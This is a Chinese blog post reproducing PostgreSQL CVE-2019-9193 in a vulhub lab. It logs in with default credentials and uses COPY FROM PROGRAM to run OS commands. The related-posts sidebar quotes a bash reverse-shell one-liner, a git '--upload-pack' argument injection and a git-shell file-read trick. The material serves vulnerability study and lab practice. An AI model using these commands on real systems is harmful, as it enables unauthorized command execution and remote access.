PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)

最新推荐文章于 2023-08-23 00:27:03 发布
最新推荐文章于 2023-08-23 00:27:03 发布
阅读量784 收藏
点赞数 1
分类专栏: 中间件漏洞复现 文章标签: sql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824510
版权

声明

好好学习,天天向上

漏洞描述

PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。

影响范围

9.3到11版本

复现过程

这里使用10.7使用vulhub

/app/vulhub-master/postgres/CVE-2019-9193

使用docker启动

docker-compose build
docker-compose up -d

登录postgres,postgres/postgres

psql --host 192.168.239.129 --username postgres

执行如下语句,FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更建立创建数据库(例如django_cve_2019_19844_poc ) 将数据库名称设置为环境变量DJANGO_DATABASE_NAME (例如, export DJANGO_DATABASE_NAME=...
pgAdmin命令执行漏洞的三年
离别歌
04-07 1110
前几天看到pgAdmin发布了新漏洞,《CVE-2024-3116 – Remote Code Execution Vulnerability in pgAdmin - PostgreSQL Tools (<=8.4): Detailed Analysis Report》。看了这个漏洞利用的过程,我总感觉有所不对,我也在『代码审计』知识星球里发表了相关疑问。随后,我研究了一下这个漏洞的来龙去...
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1041
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
CVE-2017-8386_ GIT-SHELL 漏洞复现(vulhub)
MDSEC的博客
08-23 252
GIT (分布式版本控制系统),是一个开源的分布式版本控制系统,可以有效、速地处理从很小到非常大的项目版本管理。也是Linus Torvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件。GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。按住shife+e 输入你想要查看的文件 ,就可以查看文件。然后查看CVE-2017-8386下的文件。老样子,首先拉去镜像环境。执行chmod,修改属性。这样漏洞就复现完成了。
git CVE-2017-8386
weixin_37639863的博客
02-18 747
GIT-SHELL 沙盒绕过(CVE-2017-8386)_黑白的博客-CSDN博客声明好好学习,天天向上漏洞描述GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。影响范围复现过程使用vulhub/app/vulhub-master/git/CVE-2017-8386使用docker启动docker-compose builddocker-compose up -d先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compos
CVE-2017-8386 git沙盒绕过
m0_46580995的博客
10-17 479
vulhub的cve-2017-8386 sudo ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'" shift+e !+命令
rmi远程反序列化rce漏洞_[原创]CVE-2018-1297jmeter_RMI漏洞复现
weixin_31423955的博客
12-23 471
jmeter_RMI_CVE-2018-1297复现5ecurity团队(5ecurity.cn)成员 zzw(zzw@5ecurity.cn)原创发布
PostgreSQLpostgresql-13.5-1-windows-x64.exe)
11-20
PostgreSQLpostgresql-13.5-1-windows-x64.exe)适用于Windows x86-64 PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的...
postgresql-12.4-1-windows-x64.exe
09-10
postgresql-12.4-1-windows-x64.exe
postgresql-14.1-1-windows-x64
12-05
The PostgreSQL Project thanks Jacob Champion for reporting this problem. (CVE-2021-23214) Make libpq reject extraneous data after an SSL or GSS encryption handshake (Tom Lane) A man-in-the-middle ...
PostgreSQLpostgresql-14.2-2-windows-x64.exe)
05-05
PostgreSQLpostgresql-14.2-2-windows-x64.exe),适用于Windows系统:PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的对象...
Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297)
zzzzz1284的博客
03-14 544
CVE-2018-1297
git参数注入
公众号shadow sock7
09-30 788
向前一段时间出的Jenkins的git client插件的RCE(CVE-2019-10392)就是git ls-remote命令拼接导致的命令执行。 然后找了一些git的命令注入的例子: git-ls-remote git ls-remote -h --upload-pack=calc.exe HEAD 这个也是git-ls-remote命令的参数注入漏洞: https://snyk.io/...
Apache JMeter rmi 反序列化 cve-2018-1297
whatday的专栏
08-07 495
漏洞描述 Severity: Important Vendor: The Apache Software Foundation Versions Affected: JMeter 2.X, 3.X Description [0]: When using Distributed Test only (RMI based), jmeter uses an unsecured RMI connection. This could allow an attacker to get Access to JM
PIL-CVE-2017-8291
qq_48703517的博客
05-06 1028
打开靶场 192.168.71.141:8000打开 讲poc.png上传 以 docker exec –it 7dd /bin/bash 进入容器在tmp下找到poc.png 反弹shell bash –c “bash –i >& /dev/tcp/192.168.71.131/8888 0>&1” Kali启动监听 成功 ...
【vulhub】GIT-SHELL 沙盒绕过(CVE-2017-8386)漏洞复现
qq_45300786的博客
04-16 437
通过此命令达到文艺文件读取 ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'" 输入上图的ssh命令后,在这个界面同时按shift键和e键 然后输入想查看的文件 /etc/passwd 详细文章请参考 https://blog.csdn.net/m0_46580995/article/details/109136159 https://vulhub.org/#/environments/git/CVE-2017
postgresql yyyymmdd转换成yyyy-mm-dd
最新发布
06-26
PostgreSQL中,你可以使用`TO_CHAR`函数来格式化日期字段。如果你有一个`DATE`类型的字段`DATE_OUT`,并想将其转换为'YYYY-MM-DD'格式,可以按照以下步骤操作[^2]: ```sql SELECT TO_CHAR(DATE_OUT, 'YYYY-MM-DD...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值